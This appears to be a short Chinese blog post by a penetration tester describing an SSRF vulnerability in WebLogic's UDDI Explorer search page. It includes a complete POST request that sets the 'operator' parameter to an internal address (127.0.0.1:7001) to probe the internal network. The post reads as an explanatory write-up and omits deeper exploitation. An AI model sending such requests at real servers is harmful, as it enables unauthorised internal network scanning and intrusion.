就目前小白学习情况,暂时认为weblogic中此两处存在SSRF漏洞隐患,SSRF漏洞的基本概念在此就不做阐述了。
此次我们只针对Search Public Registries 做SSRF漏洞(一)的解析,另一处SSRF漏洞静等工作接触时再补充。
下方为search操作提交的post包,operator参数存在ssrf漏洞。
POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: ************************
User-Agent: ***************************8 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://***********************/uddiexplorer/SearchPublicRegistries.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=http://*************/; privatepublishurls=********************; JSESSIONID=**************************************
Connection: close
Upgrade-Insecure-Requests: 1
operator=http://127.0.0.1:7001&rdoSearch=name&txtSearchname=1&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
若修改的内网地址/路径存在,返回值为:
则说明存在SSRF漏洞,已经证实存在访问内网的权限,7001是weblogic的默认端口,所以开放是必然的,其它端口的错误返回请各位自行验证,作为渗透测试我的工作
到这里就结束了,关于如何猜测内网网段甚至地址/端口/服务,及更深层次的利用,,,
网友评论